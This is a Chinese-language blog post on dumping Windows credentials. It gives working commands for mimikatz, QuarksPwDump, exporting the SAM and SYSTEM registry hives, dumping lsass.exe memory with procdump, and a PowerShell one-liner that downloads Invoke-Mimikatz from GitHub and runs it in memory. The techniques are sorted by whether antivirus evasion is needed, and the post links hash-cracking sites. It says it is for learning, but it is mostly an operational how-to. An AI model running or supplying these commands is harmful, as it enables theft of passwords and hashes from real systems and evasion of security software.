Windwos密码导出的几种姿势

        这篇文章主要是介绍怎么在本地提取用户密码,把知识整理了一下,把知识整理起来的威力还是挺大的。以下的方式分为要免杀和不需要免杀的方式。文章介绍的技术具有一定的攻击性,主要用于学习。

要免杀:

1.Getapss

Getapss是由闪电小子根据mimikatz编译的一个工具,可以获取明文密码。现在有32位和64位了,直接运行getpass.exe。


2.QuarksPwDump

目前可以导出 :- Local accounts NT/LM hashes + history 本机NT/LM哈希+历史登录记录 – Domain accountsNT/LM hashes + history 域中的NT/LM哈希+历史登录记录– Cached domain password 缓存中的域管理密码 【这需要域管理员登陆过】。

其实这个目前不需要免杀,最新的尝试检验了一下,发现不免杀处理,效果也可以

用法:

Options :

-k   --get-system-key

-dhl --dump-hash-local

-dhdc --dump-hash-domain-cached

-dhd --dump-hash-domain (NTDS_FILE must be specified)

-db  --dump-bitlocker (NTDS_FILE must be specified)

-sf  --system-file FILE

-sk  --system-key KEY

-nt  --ntds-file FILE

-hist --with-history (optional)

-t   --output-type JOHN/LC (optional, if no=>JOHN)

-o   --output FILE (optional, if no=>stdout)

 

Example: quarks-pwdump.exe--dump-hash-domain --with-history

 

quarks-pwdump.exe -dhl


3.mimikatz的利用

这个一个法国人写的一款工具,可以得到windows明文密码,这只是功能之一,用处还有很大。例如黄金票据的利用,这里有介绍:http://www.freebuf.com/sectool/112594.html

第一条:privilege::debug

                //提升权限

第二条:sekurlsa::logonpasswords

              //抓取密码


不需要免杀:

1.使用注册表导出hash命令:

reg save hklm\sam C:\hash\sam.hive

reg save hklm\system C:\hash\system.hive

直接执行可以把windows里所有用户的hash在注册表中导出到文件里.

具体的执行命令方法有很多,这里就不探讨这个.

打开Cain读取导出的注册表文件的hash.



选择Cracker.-再选择第一个LM & NTLMhash导入注册表文件


右键选择add tolist-选择最后一个


先添加SAM文件


再添加boot key



可以获取hash值,hash值可以在这个网站那里破解.

http://www.objectif-securite.ch/ophcrack.php

2.procdump

procdump是微软官方提供的一个小工具,在微软官方有下载

地址:https://technet.microsoft.com/en-us/sysinternals/dd996900

将工具拷贝到目标机器上执行如下命令(需要管理员权限,我选择的版本是64位)

Procdump64.exe -accepteula -ma lsass.exelsass.dmp


将这个内存dump文件拷贝到mimikatz同目录下,双击打开mimikatz执行情况如图:

mimikatz # sekurlsa::minidump lsass.dmp

Switch to MINIDUMP

mimikatz # sekurlsa::logonPasswords full

3.Powershell+mimikatz的利用

在windows中powershell是白名单来的,不需要进行免杀,可以利用直接用poweshell来调用mimikatz进行明文的获取。  powershell "IEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');  Invoke-Mimikatz"


也可以把mimikatz的poweshell文件放在边界的服务器上,利用powershell可以读取:


4.powershell+getpasshash

也是利用powershell,不过是利用getpasshash,这个还是要解hash值的。当不能够解除hash的时候,也可以进行wce进行hash的注入。

powershell "IEX (New-ObjectNet.WebClient).DownloadString('c:/Get-PassHashes.ps1');  Get-PassHashes "

成功导出hash


参考文章:

http://bbs.ichunqiu.com/thread-8826-1-1.html?from=paper





  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值